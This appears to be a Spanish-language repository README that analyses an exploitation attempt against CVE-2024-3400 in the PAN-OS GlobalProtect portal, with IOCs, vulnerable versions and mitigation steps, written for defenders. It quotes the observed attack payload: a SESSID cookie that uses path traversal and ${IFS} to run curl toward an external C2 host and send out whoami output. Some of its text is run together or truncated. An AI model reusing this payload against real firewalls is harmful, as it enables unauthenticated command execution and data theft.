
Estrategias de detección, análisis y respuesta para intentos de explotación de CVE-2024-3400 dirigidos a portales GlobalProtect de Palo Alto PAN-OS. Incluye IOCs, patrones de explotación y guía de mitigación.
Estrategias de detección, análisis y respuesta para los intentos de explotación de CVE-2024-3400 dirigidos a los portales GlobalProtect de Palo Alto PAN-OS. Incluye IOCs, patrones de explotación y guía de mitigación.
Este repositorio contiene una investigación detallada y un análisis de amenazas de CVE-2024-3400, una vulnerabilidad crítica de inyección de comandos sin autenticación que afecta al software Palo Alto Networks PAN-OS, dirigida específicamente al portal GlobalProtect.
El 18 de abril de 2024, se detectó actividad de explotación contra un firewall PAN-OS interno mediante el endpoint vulnerable /global-protect/login.esp. El atacante utilizó una cookie SESSID manipulada que contenía un comando curl ejecutado con backticks para alcanzar un servidor C2 remoto alojado en 144.172.79.92 (Miami, Florida). El payload del exploit aprovechó ${IFS} para evadir filtros simples y utilizó el directorio de telemetría de PAN-OS para preparar la actividad maliciosa. El firewall respondió con un , lo que indica que el payload probablemente se ejecutó con éxito.
200 OK
ID del Evento: 249
Regla de Detección: SOC274 – Explotación de Inyección de Comandos en PAN-OS
Hora del Evento: 18 de abril de 2024, 03:09 AM UTC
Nombre de Host: PA-Firewall-01
IP de Destino: 172.16.17.139
IP de Origen: 144.172.79.92
Método de Solicitud: POST
Endpoint: /global-protect/login.esp
Payload de Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)
Hashes Maliciosos:
SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
MD5: 0c1554888ce9ed0da1583dbdf7b31651
Script Malicioso: update.py (ejecutado usando /usr/bin/python3)





SESSID para inyección de comandos${IFS} para evasión/opt/panlogs/tmp/device_telemetrydt_send posterior a la explotación4444


10.2.9-h1, 11.0.4-h1 o 11.1.2-h3144.172.79.92logs/: Registros de detección analizados y sin procesarioc/: Hashes de archivos e IPs asociados con el ataqueanalysis/: Análisis profundo del comportamiento del exploit y rastreo de procesosreport/: Resumen e imágenes de los registros y códigos de mis investigacionesCVE-2024-3400 se refiere a una vulnerabilidad crítica en Palo Alto Networks PAN-OS, que afecta específicamente a las puertas de enlace GlobalProtect. Aquí hay un desglose de lo que se conoce públicamente al respecto:
Puntuación CVSS: 10.0 (Crítica)
Publicado: abril de 2024
Productos Afectados: PAN-OS 10.2, 11.0 y 11.1 cuando GlobalProtect está habilitado.
Explotación: Confirmada en entornos reales (zero-day)
Tipo de Vulnerabilidad: Inyección de comandos sin autenticación
CVE-2024-3400 permite a atacantes no autenticados ejecutar comandos arbitrarios en el sistema operativo del firewall. Esto esencialmente otorga control total sobre los dispositivos afectados sin necesidad de credenciales — un punto de compromiso grave para cualquier empresa que dependa de los firewalls de Palo Alto.
La puerta de enlace GlobalProtect debe estar habilitada.
Versiones específicas de PAN-OS (10.2.x, 11.0.x, 11.1.x).
Explotable a través de internet si no está detrás de capas de seguridad adicionales.
Envío de solicitudes manipuladas para explotar la falla de inyección.
Despliegue de shells remotas o descarga de payloads de segunda etapa.
El comportamiento observado incluye:
Ejecución de comandos mediante URL manipuladas
Mecanismos de persistencia
Movimiento lateral dentro de las redes
Parchear de inmediato: Palo Alto publicó correcciones; actualice a versiones no vulnerables (p. ej., 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 o posteriores).
Busque Indicadores de Compromiso (IOCs) como procesos sospechosos, conexiones salientes o historial inusual de CLI.
Utilice herramientas como Shodan o inventarios de activos para encontrar dispositivos vulnerables.
Busque IPs externas que accedan a GlobalProtect sin autenticación válida.
Compruebe la ejecución de comandos sospechosos en los registros (show system processes, cat /etc/passwd, etc.).
Supervise el comportamiento del firewall y alerte sobre conexiones salientes anómalas.
Este repositorio sirve tanto como informe de investigación interno como recurso educativo para defensores que buscan comprender la explotación real de las vulnerabilidades de PAN-OS. Las contribuciones y observaciones adicionales son bienvenidas.